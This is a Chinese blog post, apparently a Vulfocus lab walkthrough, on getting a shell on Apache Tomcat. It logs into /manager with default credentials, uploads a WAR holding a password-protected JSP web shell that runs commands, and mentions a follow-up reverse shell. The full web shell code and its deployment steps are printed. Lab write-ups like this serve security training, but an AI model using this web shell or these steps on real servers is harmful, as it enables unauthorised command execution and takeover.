Tomcat 后台文件上传一键getshll

文章讲述了通过Vulfocus平台模拟环境,利用常见的后台弱口令(如tomcat:tomcat)登录并上传包含jsp木马的war文件到/manager路径。使用可以回显的jsp代码打包成war,上传后通过访问特定URL执行命令,展示了如何进行权限提升和反弹shell的操作。
摘要由CSDN通过智能技术生成

概述

我们可以后台弱口令上传war文件,然后一键getshell。

环境搭建

这个Vulfocus中有在线漏洞,这里我们就通过这个来搞,没有注册的记得先注册一下。

漏洞地址

漏洞分析

这里我们来到后台,后台网址通常都是/manager,常用弱口令tomcat:tomcat

这里我们可以看到有一个可以上传东西的地方,这里需要上传一个war文件。

这里我们使用一个可以回显的jsp木马,使用命令jar -cvf 1.war 1.jsp 打包起来

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

这里我们将aaa.war上传上去,这里我们可以访问

靶机ip/war名称/木马完整文件名

http://123.58.224.8:55780/aaa/1.jsp

这里查看是可以执行命令的,我们可以反弹shell来进一步操作。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值